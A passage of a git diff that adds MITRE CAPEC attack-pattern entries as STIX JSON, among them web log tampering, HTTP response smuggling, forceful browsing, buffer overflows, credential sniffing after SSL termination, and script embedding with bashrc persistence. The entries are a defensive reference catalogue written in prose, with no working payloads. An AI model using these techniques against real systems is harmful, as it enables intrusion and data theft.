"bundle", + "id": "bundle--7c0ceba3-d9aa-49f3-aaa1-f8393904bad5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Web Logs Tampering", + "description": "Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to \"Log Injection-Tampering-Forging\" except that in this case, the attack is targeting the logs of the web server and not the application.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/81.html", + "external_id": "CAPEC-81" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html", + "external_id": "CWE-117" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html", + "external_id": "CWE-93" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html", + "external_id": "CWE-75" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/221.html", + "external_id": "CWE-221" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html", + "external_id": "CWE-96" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html", + "external_id": "CWE-150" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html", + "external_id": "CWE-276" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/279.html", + "external_id": "CWE-279" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html", + "external_id": "CWE-116" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322.json b/capec/attack-pattern/attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322.json new file mode 100644 index 0000000000..8471ab35b9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322.json @@ -0,0 +1,36 @@ +{ + "type": "bundle", + "id": "bundle--fdb0c860-a9f6-4092-9dc8-3272108858be", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--7223c9f9-1b02-4cd5-ba2f-58bf87784322", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Detect Unpublicized Web Services", + "description": "An attacker searches a targeted web site for web services that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging services, or otherwise predictable services within the site tree. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/144.html", + "external_id": "CAPEC-144" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac.json b/capec/attack-pattern/attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac.json new file mode 100644 index 0000000000..116a9726ef --- /dev/null +++ b/capec/attack-pattern/attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--f144a362-c3b4-4a5d-b216-2a6b001f3168", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--723de629-6051-4e46-b6e7-27972b2f8bac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "HTTP Response Smuggling", + "description": "An attacker injects content into a server response that is interpreted differently by intermediaries than it is by the target browser. To do this, it takes advantage of inconsistent or incorrect interpretations of the HTTP protocol by various applications. For example, it might use different block terminating characters (CR or LF alone), adding duplicate header fields that browsers interpret as belonging to separate responses, or other techniques. Consequences of this attack can include response-splitting, cross-site scripting, apparent defacement of targeted sites, cache poisoning, or similar actions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/273.html", + "external_id": "CAPEC-273" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html", + "external_id": "CWE-436" + }, + { + "source_name": "reference_from_CAPEC", + "description": "HTTP Response Smuggling, Beyond Security", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html", + "external_id": "REF-117" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted server must allow the attacker to insert content that will appear in the server's response." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--72be688f-e257-43c9-babb-f9368c7fd64b.json b/capec/attack-pattern/attack-pattern--72be688f-e257-43c9-babb-f9368c7fd64b.json new file mode 100644 index 0000000000..1bf743c604 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--72be688f-e257-43c9-babb-f9368c7fd64b.json @@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--67590b29-9ea5-43b0-b693-8d7cda04861e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--72be688f-e257-43c9-babb-f9368c7fd64b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Application API Button Hijacking", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/388.html", + "external_id": "CAPEC-388" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html", + "external_id": "CWE-471" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html", + "external_id": "CWE-345" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html", + "external_id": "CWE-346" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:\n [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]\n By altering the destination of \"Claim_Link\" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \"Yes\" or \"No\" causes the user to load the attackers' code.\n " + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726.json b/capec/attack-pattern/attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726.json new file mode 100644 index 0000000000..40d6f48f5f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726.json @@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--84463724-de57-4602-8dac-6a5d801680f0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--738f95bd-2885-4cb4-a782-d1a58198d726", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Forceful Browsing", + "description": "An attacker employs forceful browsing to access portions of a website that are otherwise unreachable through direct URL entry. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html", + "external_id": "CAPEC-87" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html", + "external_id": "CWE-425" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate himself in that role.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19.json b/capec/attack-pattern/attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19.json new file mode 100644 index 0000000000..728367e238 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19.json @@ -0,0 +1,108 @@ +{ + "type": "bundle", + "id": "bundle--3afe402b-8af0-4d93-8278-8ad9e2fadf2d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Buffer Overflow in Local Command-Line Utilities", + "description": "This attack targets command-line utilities available in a number of shells. An attacker can leverage a vulnerability found in a command-line utility to escalate privilege to root.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/9.html", + "external_id": "CAPEC-9" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html", + "external_id": "CWE-118" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html", + "external_id": "CWE-119" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html", + "external_id": "CWE-733" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n \n Attack Example: HPUX passwd\n A buffer overflow in the HPUX passwd command allows local users to gain root privileges via a command-line option.\n \n \n Attack Example: Solaris getopt\n A buffer overflow in Solaris's getopt command (found in libc) allows local users to gain root privileges via a long argv[0].\n \n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes a command-line utility to the user.", + "The command-line utility exposed by the target host has a buffer overflow vulnerability that can be exploited." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57.json b/capec/attack-pattern/attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57.json new file mode 100644 index 0000000000..d9482b5f23 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57.json @@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--4f113020-649c-4bfe-87c6-2d1df2260b3d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--750c8077-a3b7-4332-9fc6-a59435be6c57", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data", + "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/57.html", + "external_id": "CAPEC-57" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html", + "external_id": "CWE-300" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/724.html", + "external_id": "CWE-724" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the attacker can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Opportunity to intercept must exist beyond the point where SSL is terminated.", + "The attacker must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path." + ], + "x_capec_skills_required": { + "Low": "To insert a network sniffer or other listener into the communication stream" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec.json b/capec/attack-pattern/attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec.json new file mode 100644 index 0000000000..971f3df4ee --- /dev/null +++ b/capec/attack-pattern/attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--99cd5517-cb6d-4e22-83d5-4aaac9d55f34", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--75c788ca-dc5d-443d-abeb-301ce54cd9ec", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Checksum Spoofing", + "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. This would prevent the recipient from realizing that a change occurred.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/145.html", + "external_id": "CAPEC-145" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html", + "external_id": "CWE-354" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.", + "The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.", + "The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack." + ], + "x_capec_resources_required": [ + "The adversary must have a utility that can intercept and modify messages between the sender and recipient." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0.json b/capec/attack-pattern/attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0.json new file mode 100644 index 0000000000..0bc1a2c690 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0.json @@ -0,0 +1,65 @@ +{ + "type": "bundle", + "id": "bundle--fb9cf362-a242-48d2-9dc4-3dea2abc79b9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--76620282-5954-49a4-9d43-ec0449ad2bf0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Embedding Scripts within Scripts", + "description": "An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The adversary leverages this capability to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The adversary must have the ability to inject their script into a script that is likely to be executed. If this is done, then the adversary can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. These attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/19.html", + "external_id": "CAPEC-19" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser's implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on.\n \n The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of.\n In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments.\n ", + "~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed. These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be able to execute scripts, and also grant the adversary privilege to write/upload scripts." + ], + "x_capec_skills_required": { + "Low": "To load malicious script into open, e.g. world writable directory", + "Medium": "Executing remote scripts on host and collecting output" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--77389957-a3e9-429a-9fec-7da40617e779.json b/capec/attack-pattern/attack-pattern--77389957-a3e9-429a-9fec-7da40617e779.json new file mode 100644 index 0000000000..93bac61149 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--77389957-a3e9-429a-9fec-7da40617e779.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--48cd81bf-8cc3-4263-8f88-db2c2037ff4f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--77389957-a3e9-429a-9fec-7da40617e779", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Hardware Component Substitution During Baselining", + "description": "An attacker with access to system components during allocated baseline development can substitute a maliciously altered hardware component for a baseline component in the during the product development and research phase. This can lead to adjustments and calibrations being made in the product, so that when the final product with the proper components is deployed, it will not perform as designed and be advantageous to the attacker.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/516.html", + "external_id": "CAPEC-516" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker supplies the product development facility of a network security device with a hardware component that is used to simulate large volumes of network traffic. The device claims in logs, stats, and via the display panel to be pumping out very large quantities of network traffic, when it is in fact putting out very low volumes. The developed product is adjusted and configured to handle the what it believes to be a heavy network load, but when deployed at the victim site the large volumes of network traffic are dropped instead of being processed by the network security device. This allows the attacker an advantage when attacking the victim in that the attacker's presence may not be detected by the device." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker will need either physical access or be able to supply malicious hardware components to the product development facility." + ], + "x_capec_skills_required": { + "High": "Resources to physically infiltrate supplier.", + "Medium": "Intelligence data on victim's purchasing habits." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--790a5926-608b-425d-8f1a-111d4e65e47f.json b/capec/attack-pattern/attack-pattern--790a5926-608b-425d-8f1a-111d4e65e47f.json new file mode 100644 index 0000000000..14b3c09584 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--790a5926-608b-425d-8f1a-111d4e65e47f.json @@ -0,0 +1,39 @@ +{ + "type": "bundle", + "id": "bundle--2307ded4-734c-4e3e-8dd0-6bf704f23eba", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--790a5926-608b-425d-8f1a-111d4e65e47f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Infected Hardware", + "description": "An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/452.html", + "external_id": "CAPEC-452" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the hardware currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git 